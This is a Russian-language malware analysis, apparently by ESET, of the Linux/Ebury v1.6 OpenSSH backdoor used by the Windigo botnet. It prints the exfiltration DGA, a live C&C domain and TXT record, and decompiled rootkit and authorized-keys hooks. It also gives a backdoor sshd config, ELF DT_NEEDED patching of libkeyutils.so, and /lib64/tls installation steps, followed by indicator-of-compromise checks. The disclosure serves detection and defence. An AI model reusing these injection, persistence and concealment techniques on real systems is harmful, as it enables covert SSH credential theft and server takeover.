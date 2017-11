Новый DGA для резервной эксфильтрации

def DGA(domain_no): TLDS = [ 'info', 'net', 'biz' ] KEY = "fmqzdnvcyelwaibsrxtpkhjguo" h = "%x" % ((domain_no * domain_no + 3807225) & 0xFFFFFFFF) g = "" for i in range(len(h))[::-1]: g += KEY[((ords(h[i]) * 3579) + (ords(h[-1]) + i + domain_no)) % len(KEY)] g += h[i] g += KEY[((ords(h[-1]) * 5612) + (len(h) + domain_no - 1)) % len(KEY)] g += '.%s' % TLDS[domain_no % len(TLDS)] return g

@@ -1,10 +1,10 @@ def DGA(domain_no): KEY = "fmqzdnvcyelwaibsrxtpkhjguo" - h = "%x" % ((domain_no * domain_no + 4091073) & 0xFFFFFFFF) + h = "%x" % ((domain_no * domain_no + 3807225) & 0xFFFFFFFF) g = "" for i in range(len(h))[::-1]: - g += KEY[((ords(h[i]) * 4906) + (ords(h[-1]) + i + domain_no)) % len(KEY)] + g += KEY[((ords(h[i]) * 3579) + (ords(h[-1]) + i + domain_no)) % len(KEY)] g += h[i] - g += KEY[((ords(h[-1]) * 6816) + (len(h) + domain_no - 1)) % len(KEY)] + g += KEY[((ords(h[-1]) * 5612) + (len(h) + domain_no - 1)) % len(KEY)] g += '.%s' % TLDS[domain_no % len(TLDS)] return g

larfj7g1vaz3y.net

idkff7m1lac3g.biz

u2s0k8d1ial3r.info

h9g0q8a1hat3s.net

f2y1j8v1saa3t.biz

xdc1h8n1baw3m.info

raj2p8z1aae3b.net

o9f3v8r1oaj3p.biz

tav4h8n1baw3r.info

hdm5o8e1tas3n.net

-----BEGIN RSA PUBLIC KEY-----

MIGJAoGBAOadSGBGG9x/f1/U6KdwxfGzqSj5Bcy4aZpKv77uN4xYdS5HWmEub5Rj

nAvtKybupWb3AUWwN7UPIO+2R+v6hrF+Gh2apcs9I9G7VEBiToi2B6BiZ3Ly68kj

1ojemjtrG+g//Ckw/osESWweSWY4nJFKa5QJzT39ErUZim2FPDmvAgMBAAE=

-----END RSA PUBLIC KEY-----

larfj7g1vaz3y.net. 1737 IN A 78.140.134.7

larfj7g1vaz3y.net. 285 IN TXT "ItTFyJ6tegXn9HkHa+XZX1+fZw0IsfhXl05phu1F7ZXDP4HtKMvrXW8NbUSjY8vkQgDdKsSaSCyrvfkhHodhVQLhIKJJY64HeoInb3m4SCNZNOhx9qjYRnuR0Ci7BHNWakJC/QdoQ4UNKkOrvvb42kN7TU6jqZCYBtusXd37tNg="

larfj7g1vaz3y[.]net:3328801113:1504126800

Новые функции

readdir

readdir64

struct dirent *__fastcall readdir(__int64 a1)

{

struct dirent *dir_entry; // rax

struct dirent *dir_entry_1; // rbx

__ino_t inode; // rax



do

{

if ( !readdir_0 )

readdir_0 = F_resolve_func("readdir");

dir_entry = readdir_0(a1);

dir_entry_1 = dir_entry;

if ( !exports_hook_activated )

break;

if ( !dir_entry )

break;

if ( !ebury_inode )

break;

inode = dir_entry->d_ino;

if ( inode != ebury_inode && inode != ebury_lstat_inode )

break;

}

while ( ebury_filename && !strncmp(dir_entry_1->d_name, ebury_filename,

ebury_filename_len_before_extension) );

return dir_entry_1;

}

sshd

execve

LD_PRELOAD

LD_PRELOAD=<Ebury_filename>

sshd

parse_server_config

process_server_config_line

sshd

PrintLastLog no

PrintMotd no

PasswordAuthentication no

PermitRootLogin yes

UseLogin no

UsePAM no

UseDNS no

ChallengeResponseAuthentication no

LogLevel QUIET

StrictModes no

PubkeyAuthentication yes

AllowUsers n

AllowGroups n

DenyUsers n

DenyGroups n

AuthorizedKeysFile /proc/self/environ

Banner /dev/null

PermitTunnel yes

AllowTcpForwarding yes

PermitOpen any

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDr3cAedzlH3aq3nrIaaQdWpqESH

CvfGi4nySL1ikMJowgonAf5qFtH4JKMn7HhW5hWBAyYj2ygjzXd3BD+ADXDurAlDG

bh0NsyCJDFCQ8Bsrwl7p5ZEPEfBOh99IBMbAOgqVmM9tTv7ci05yoBEEcFsNaBg00

H+m0GooLsNsl+5TG3a2aUg6Dg2CKfi55HHTHC/9rqoAdv7Gbc5Y7W8xrNIjOIuxDx

Bx353bKO0uSuL06m2Q4m8kYlaw51ZWVylIhGOPm4ldqP4Jjls8QtL/Eg2ZD7epUq6

3E/xqI4tMEQl9BmW1Df5+LjbVRoEFBWEbMDfHZm7XNG5R3UiwX4H2Ub

AuthorizedKeysFile

/proc/self/environ

open

open64

/proc/self/environ

.ssh/authorized_keys

parse_server_config

process_server_config_line

fgets

sshd

fgets

fgets

char *__fastcall fgets_hook(char *s, __int64 size, FILE *stream)

{

int fd_env; // ebp

char *result; // rax



if ( !(backdoor_command & 1) )

return fgets_0(s);

fd_env = fd_proc_self_environ;

if ( fd_proc_self_environ <= 0 || fd_env != fileno(stream) )

return fgets_0(s);

strcpy(

s,

"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDr3cAedzlH3aq3nrIaaQdWpqESHCvfGi4nySL1ikMJowgonAf5qFtH4JKMn7HhW5hWBAyYj2ygjzXd" "3BD+ADXDurAlDGbh0NsyCJDFCQ8Bsrwl7p5ZEPEfBOh99IBMbAOgqVmM9tTv7ci05yoBEEcFsNaBg00H+m0GooLsNsl+5TG3a2aUg6Dg2CKfi55HHTHC" "/9rqoAdv7Gbc5Y7W8xrNIjOIuxDxBx353bKO0uSuL06m2Q4m8kYlaw51ZWVylIhGOPm4ldqP4Jjls8QtL/Eg2ZD7epUq63E/xqI4tMEQl9BmW1Df5+Lj"

"bVRoEFBWEbMDfHZm7XNG5R3UiwX4H2Ub

");

result = s;

fd_proc_self_environ = 0;

return result;

}

memcpy

char *__fastcall memcpy_hook(char *dst, const char *src, size_t len)

{

size_t len_1; // r12

char *result; // rax



len_1 = len;

memcpy_orig(dst, src, len);

if ( len_1 > 0x1F && !strncmp(src, "chacha20-poly1305@openssh.com,", 0x1EuLL) )

result = memcpy_orig(dst, src + 30, len_1 - 30);

else

result = dst;

return result;

}

Новые методы установки

libkeyutils.so

libkeyutils.so

libkeyutils.so

libkeyutils.so.1

libkeyutils.so

libkeyutils.so

.so

.dynamic

libsbr.so

--- ./libkeyutils.so.1-5 2017-10-13 21:19:24.269521814 -0400

+++ ./libkeyutils.so.1-5.patched 2017-10-13 21:19:17.405092274 -0400

@@ -1,5 +1,5 @@



-Dynamic section at offset 0x2cf8 contains 26 entries:

+Dynamic section at offset 0x2cf8 contains 27 entries:

Tag Type Name/Value

0x0000000000000001 (NEEDED) Shared library: [libc.so.6]

0x000000000000000e (SONAME) Library soname: [libkeyutils.so.1]

@@ -26,4 +26,5 @@

0x000000006fffffff (VERNEEDNUM) 1

0x000000006ffffff0 (VERSYM) 0xdf0

0x000000006ffffff9 (RELACOUNT) 3

+ 0x0000000000000001 (NEEDED) Shared library: [libsbr.so]

0x0000000000000000 (NULL) 0x0

libsbr.so

__bss_start

_\x00libsbr.so

__bss_start

libkeyutils.so

libsbr.so

.dynamic

.dynamic

typedef struct {

Elf32_Sword d_tag;

union {

Elf32_Word d_val;

Elf32_Addr d_ptr;

} d_un;

} Elf32_Dyn;



typedef struct {

Elf64_Sxword d_tag;

union {

Elf64_Xword d_val;

Elf64_Addr d_ptr;

} d_un;

} Elf64_Dyn;

libkeyutils.so

Elf64_Dyn dyn;

dyn.d_tag = DT_NEEDED;

dyn.d_val = 0x38F;

libkeyutils1

$ dpkg --verify libkeyutils1

libkeyutils.so.1

libkeyutils

libkeyutils.so

libkeyutils.so.1

/lib/

/lib64/

/lib{,64}/tls/

/lib/tls/

/lib64/tls/

ldconfig

/lib{,64}/tls/libkeyutils.so.1

[root@c2093ca76055 lib64]# ldd /usr/bin/ssh | grep -i libkeyutils

libkeyutils.so.1 => /lib64/libkeyutils.so.1 (0x00007ff67774f000)

[root@c2093ca76055 lib64]# cp libkeyutils.so.1.5 /lib64/tls/

[root@c2093ca76055 lib64]# ldd /usr/bin/ssh | grep -i libkeyutils

libkeyutils.so.1 => /lib64/libkeyutils.so.1 (0x00007f44ac6ba000)

[root@c2093ca76055 lib64]# ldconfig

[root@c2093ca76055 lib64]# ldd /usr/bin/ssh | grep -i libkeyutils

libkeyutils.so.1 => /lib64/tls/libkeyutils.so.1 (0x00007fc12db23000)

[root@c2093ca76055 lib64]# ls -al /lib64/tls

total 24

dr-xr-xr-x 1 root root 4096 Oct 18 14:34 .

dr-xr-xr-x 1 root root 4096 Oct 18 13:25 ..

lrwxrwxrwx 1 root root 18 Oct 18 14:34 libkeyutils.so.1 -> libkeyutils.so.1.5

-rwxr-xr-x 1 root root 15688 Oct 18 14:34 libkeyutils.so.1.5

libkeyutilsе

libkeyutils.so

/lib{,64}/tls/

ldconfig

[root@c2093ca76055 tls]# pwd

/lib64/tls

[root@c2093ca76055 tls]# ls -l

total 16

lrwxrwxrwx 1 root root 18 Oct 18 14:34 libkeyutils.so.1 -> libkeyutils.so.1.5

-rwxr-xr-x 1 root root 15688 Oct 18 14:34 libkeyutils.so.1.5

[root@c2093ca76055 tls]# rm libkeyutils.so.1.5

[root@c2093ca76055 tls]# ldconfig

[root@c2093ca76055 tls]# ls -l

total 0

[root@c2093ca76055 tls]# ldd /usr/bin/ssh | grep -i libkeyutils

libkeyutils.so.1 => /lib64/libkeyutils.so.1 (0x00007f7b89349000)

[root@c2093ca76055 tls]# ls -l /lib64/libkeyutils.so.1

lrwxrwxrwx 1 root root 18 Oct 18 13:25 /lib64/libkeyutils.so.1 -> libkeyutils.so.1.5

tls

Вывод

Индикаторы компрометации

/tmp/dbus-

dbus

dbus

$ lsof -U | grep -F @/tmp/dbus- | grep -v ^dbus

libkeyutils.so*

/lib/tls/

/lib64/tls/

objdump -x libkeyutils.so.1

readelf -d libkeyutils.so.1

$ objdump -x /lib64/libkeyutils.so.1 | grep NEEDED | grep -v -F -e libdl.so -e libc.so

LD_PRELOAD

libkeyutils

$ LD_DEBUG=symbols /bin/true 2>&1| grep libkeyutils

В феврале 2014 года вирусная лаборатория ESET представила исследование OpenSSH бэкдора и вредоносной программы Linux/Ebury для кражи учетных данных. Дальнейшее исследование показало, что этот компонент является ядром набора из нескольких семейств вредоносных программ, задействованных в «Операции Windigo». Открытие легло в основу отчета , описывающего эту киберкампанию.В феврале 2017 года мы обнаружили образец Ebury с поддержкой новых функций. Номер новой версии – 1.6.2а. На момент обнаружения этого образца последней известной нам версией была 1.5.х, выявленная несколькими месяцами ранее. В ходе дальнейшего расследования мы поняли, что инфраструктура, отвечающая за кражу учетных данных, все еще функционирует, и Ebury активно используется кибергруппой Windigo.Первоначально мы перечисляли индикаторы компрометации (IoC) для версии 1.4 Ebury. CERT-Bund опубликовал IoC для версии 1.5. В данном посте представлен технический анализ версии 1.6, открытой в феврале 2017 года, а также IoC для версий 1.5 и 1.6.В Ebury v1.4 предусмотрен резервный механизм на базе алгоритма генерации доменов (DGA), который используется, когда атакующий не подключается к зараженной системе через OpenSSH бэкдор на протяжении трех дней. В этих условиях Ebury переносит собранные данные, используя сгенерированный домен. У Ebury v1.6 тот же механизм, но есть небольшие изменения в самом DGA. У этих двух версий отличаются только константы, как показано ниже.Ebury последовательно пробует сгенерированные имена доменов, пока не находит тот, у которого есть запись TXT, сделанная оператором. Для проверки владельца домена Ebury проверяет, может ли запись TXT быть дешифрована с помощью открытого ключа RSA, встроенного в ее код.A-запись домена игнорируется Ebury.Дешифрованная информация состоит из трех CSV-полей. Вот образец данных, хранящихся в DNS-записи для larfj7g1vaz3y[.]net на январь 2018 года:Первое поле содержит имя домена, так что подписанные данные не могут быть повторно использованы для другого домена. Второе поле – IP-адрес C&C сервера. Третье поле содержит метку времени UNIX, используемую в качестве даты окончания действия подписанных данных. Дата окончания действия – новое поле, добавленное для обхода метода sinkhole, начиная с версии 1.6. Если кто-либо попытается завладеть доменом и IP-адресом сервера, на который посылаются украденные данные (exfiltration server), подписанные данные можно будет использовать только на протяжении ограниченного промежутка времени. Это уменьшит влияние успешных попыток синкхолинга, происходящих почти во всех предыдущих версиях DGA.Не думаем, что операторы Ebury на самом деле рассчитывали воспользоваться резервным каналом. В изученных образцах мы обнаружили множество багов, из-за которых механизм невозможно выполнить. Код явно не прошел полное тестирование. По этой причине мы можем предположить, что операторы Ebury довольно редко теряют доступ к зараженным машинам. Вероятно, их не беспокоит потеря нескольких – под их контролем множество систем. Почему для реализации нерабочего механизма предпринято столько усилий, неизвестно.— Несколько измененный DGA (измененные константы)— Добавлена дата окончания действия для проверки DNS-записи сервера сбора данных— Новый зарегистрированный домен: larfj7g1vaz3y[.]net— Новый IP-адрес сервера, на который посылаются украденные данные: 198[.]105.121.89Новые функции были добавлены в версии 1.6. По неизвестным причинам они доступны не во всех изученных образцах данной версии.Теперь Ebury использует приемы самомаскировки, обычно описываемые как «руткит, работающий в пространстве пользователя» (user-mode). Для этого программа перехватывает функциюили, каждая из которых используется для составления списка записей каталога. Если следующая выдаваемая структура каталога – файл общей библиотеки Ebury, то ловушка пропускает ее и выдает вместо этого следующую запись.Активация ловушек выполняется Ebury путем инжекта динамической библиотеки в каждый процесс-потомок. Чтобы внедрить себя в субпроцессы, Ebury перехватываети использует динамическую переменную линкера. Каждый раз, когда создается новый процесс, Ebury добавляетв свою среду. статье на srvfail.com упоминается тред на StackExchange пользователя, машина которого предположительно была скомпрометирована Ebury. Поведение, которое он описывает, соответствует техникам самомаскировки, которые мы наблюдали в Ebury версии 1.6.2a.Ранние версии Ebury работали на определенных версиях OpenSSH и зависели от дистрибутива Linux. Теперь это не так. Большинство практик применения патчей OpenSSH были заменены на ловушки функций. Мы пробовали устанавливать Ebury на машины под Debian Jessie, CentOS 7 и Ubuntu Artful при помощи того же образца, и он работал во всех случаях.Для инжекта конфигурации сервера OpenSSH напрямую в память Ebury парсит бинарный код, который отображен в том же процессе, ищущем две разные функции. Он пытается найти адресили. Если попытка безуспешна, он понижает свойства безопасности посредством отключения SELinux Role-Based Access Control и выключением PAM модулей. Когда одна из функций успешно обработана, Ebury использует ее во время изменения конфигурациипри использовании бэкдора.Авторы Ebury также усилили механизм бэкдора. Вместо того, чтобы полагаться на пароль, закодированный в строке клиентской версии SSH, активация бэкдора теперь требует персональный ключ для аутентификации. Возможно, эта дополнительная проверка была добавлена, чтобы предотвратить доступ к скомпрометированному Ebury серверу тем, кто может найти пароль к бэкдору.При попытке подключения к бэкдору Ebury изменяет опцию, чтобы указать на. Она перехватываетилии проверяет, есть ли попытка открытияили пути, содержащего. Вторая проверка может быть использована в качестве резервной, если Ebury не сможет обработатьдля принудительной передачи своей конфигурации. Ebury также перехватывает, который вызываетсядля прочтения содержимого файла authorized_keys. Глобальная переменная используется для того, чтобы убедиться, чтовызывается после открытия файла authorized_keys. Затем ловушка заполняет буфероткрытым ключом операторов Ebury, таким образом ключ атакующих используется для аутентификации.Назначение ловушки перехвата функции копирования памяти () пока не установлено.Мы знаем, что ловушка используется для удаления алгоритма chacha20-poly1305 во время обмена ключом SSH. Странно, что авторы Ebury не хотят, чтобы этот алгоритм использовался.Раньше Ebury добавлял полезную нагрузку в библиотеку. Файл содержал и легитимные функции libkeyutils, и вредоносный код Ebury, запускаемый при загрузке. В случае заражения размер файла был больше обычного – мы указывали на это как на признак компрометации еще в 2014 году.Мы наблюдали, как этот метод использовался в версии 1.6.2, в то время как авторы Ebury придумали новые способы обхода наших индикаторов компрометации. Они все еще используют файл, но иначе.Исходя из наших наблюдений, скрипты и методы внедрения отличаются в зависимости от дистрибутива Linux атакуемой системы.На системах Debian/Ubuntu Ebury сейчас внедряется с помощью нового метода. Так какзагружается клиентом OpenSSH и исполняемыми файлами сервера OpenSSH, он остается интересной целью для атакующих. Ранее мы замечали, что Ebury устанавливался посредством изменения символьной ссылкидля указания на вредоносную версию библиотеки. У измененной библиотеки есть конструктор, где хранится код инициализации Ebury. Каждый раз при загрузкевызывается конструктор. Таким образом, при каждом запуске клиента или сервера OpenSSH происходит инжект Ebury в процесс.Последний метод внедрения на Debian/Ubuntu теперь основан на патче, чтобы заставить его загрузить Ebury, хранящуюся в отдельном файле. Сравнив оригинальную и пропатченную версии, мы обнаружили, что в разделезаголовка ELF-файла есть дополнительная запись. Запись имеет тип NEEDED (0x01), что обозначает зависимость исполняемого файла и что он загружается в процессе работы. В скрипте развертывания, который мы изучили, загружаемая библиотека называетсяи содержит вредоносный код Ebury.Процесс применения патча состоит из двух шагов. Во-первых, строку «» необходимо поместить в таблицу строк бинарного файла. Во-вторых, новую запись типа 0x1 (DT_NEEDED) необходимо добавить в динамический раздел заголовков ELF-файла. Авторы Ebury заменили строку «» на «». Так какне используется динамическим линкером, изменение этого символа не влияет на исполнение библиотеки. Рисунок ниже показывает различия между оригинальной и измененной таблицами строкТеперь, когда строкахранится в таблице строк, в разделнужно добавить новую запись. На рисунке 2 показаны различия между разделами .dynamic оригинального и пропатченного libkeyutils.so.Разделсодержит массив Elf64_Dyn для бинарных файлов amd64 и Elf64_Dyn – для i386. Определения этих структур представлены ниже.Ниже показаны 64-битные версии. Таким образом, новые записи в разделе .dynamic можно записать следующим образом.Для большей скрытности операторы Ebury позаботились о том, чтобы пропатчить суммы MD5 пакета. Проверить систему на заражение, используя простую проверку целостности пакета, невозможно. Подобная команда не покажет наличие ошибок.Команда проверки целостности пакета:При внедрении в качестве отдельной библиотеки Ebury использует множество имен файлов. Ниже список известных нам имен файлов:— libns2.so— libns5.so— libpw3.so— libpw5.so— libsbr.so— libslr.soТехники, похожие на используемую для внедрения на Debian/Ubuntu, применяются и для CentOS. Атакующие ставят патч на, чтобы форсировать загрузку дополнительной библиотеки. Кроме того, мы заметили новую технику, используемую для внедрения Ebury в системы под CentOS/RedHat. Мы пока не знаем всех деталей инсталляционного процесса, но просмотр некоторых онлайн-отчетов позволил сделать некоторые предположения о том, как происходит внедрение.Нам известно, что Ebury внедряется в качестве отдельного совместно используемого объекта файлом, способом, похожим на внедрение в Debian. Мы наблюдали и другой способ установки, который предположительно является методом внедрения в версии 1.6. Как и в предыдущих версиях Ebury, операторы создали свою версию, к которой добавили конструктор, содержащий вредоносный код. Вместо измененияизилиони помещают свои файлы в папку, так как динамический линкер начинает обработку зависимостей с этой директории.Мы считаем, что процесс внедрения этой версии начинается с помещения Ebury в папкуили, в зависимости от архитектуры системы жертвы. Затем запускавтоматически создает символьную ссылку, указывающую на вредоносный совместно используемый объект.Вдобавок, это сделано для простой системы деинсталляции, которая не требует манипуляций с символическими ссылками и хранения резервных копий оригинального совместно используемого объекта, если что-то пойдет не так во время внедрения. Достаточно удалить вредоносный файлв папкеи затем запуститьзаново, чтобы система вернулась в первоначальное состояние.Подкаталогиспользуется вместе с функцией загрузчика Linux. Благодаря этому, если ЦП поддерживает дополнительный набор команд, то команда, находящаяся в данной директории, получает более высокий приоритет в сравнении с «обычной».Несмотря на арест Максима Сенаха, ботнет Windigo продолжает работу. Ebury, основной компонент Linux-ботнета, приобрел ряд существенных улучшений. Сейчас он использует самомаскирующие техники и новые способы инжекта в связанные с OpenSSH процессы. Кроме того, он использует новый алгоритм генерации доменов (DGA) для поиска валидной записи TXT домена, подписанной приватным ключом злоумышленников – в ней скрыт адрес IP-сервера сбора данных. Добавлена дата истечения срока для предотвращения повторного использования подписанных данных, что позволяет предотвратить попытки синкхолинга. Операторы Windigo регулярно просматривают публикуемые индикаторы компрометации и адаптируют ПО, чтобы избежать обнаружения. Это стоит учитывать при попытке определить заражение системы с помощью известных IoCs – чем раньше они опубликованы, тем более вероятно, что уже устарели.В этом разделе мы публикуем наши индикаторы компрометации, которые могут помочь определить последние версии Ebury. Мы предоставляем их, чтобы помочь сообществу определить заражение своих систем, но не претендуем на совершенство.Сейчас Ebury использует UNIX-сокет для коммуникации с внешним процессом, отвечающим за кражу данных. В большинстве случаев имя сокета начинается с "". Настоящийможет создавать сокет похожим образом. Однако Ebury делает это при помощи процессов, не связанных с легитимным. Если результатом следующей команды является сокет, это подозрительно:Ниже приведен список процессов, которые, как мы знаем, Ebury использует для утечки данных:— auditd— crond— anacron— arpd— acpid— rsyslogd— udevd— systemd-udevd— atd— hostname— syncНа CentOS/Redhat подозрительно наличие файлаилиЗапуск(или) отображает динамический раздел заголовка файла ELF. Что-либо с тэгом NEEDED (type 1) кроме libc или libdl выглядит подозрительным.Если ваша машина заражена версией Ebury с руткитом пространства пользователя, есть много способов определить это. Ebury внедряет себя при помощи динамического линкерасистемной переменной, поэтому мы можем воспользоваться другой системной переменной для обнаружения процесса динамического линкера. Еслизагружается в какой-либо процесс, где его не должно быть, скорее всего система заражена версией Ebury с включенным руткитом. Если следующая команда выдает результат, это также подозрительно:Если вы определили зараженную машину, рекомендуем произвести, поскольку Windigo иногда устанавливает дополнительные вредоносные программы. Машина, скомпрометированная Ebury, может быть заражена и другой малварью. Кроме того, считайте, что все учетные данные пользователя и ключи SSH скомпрометированы –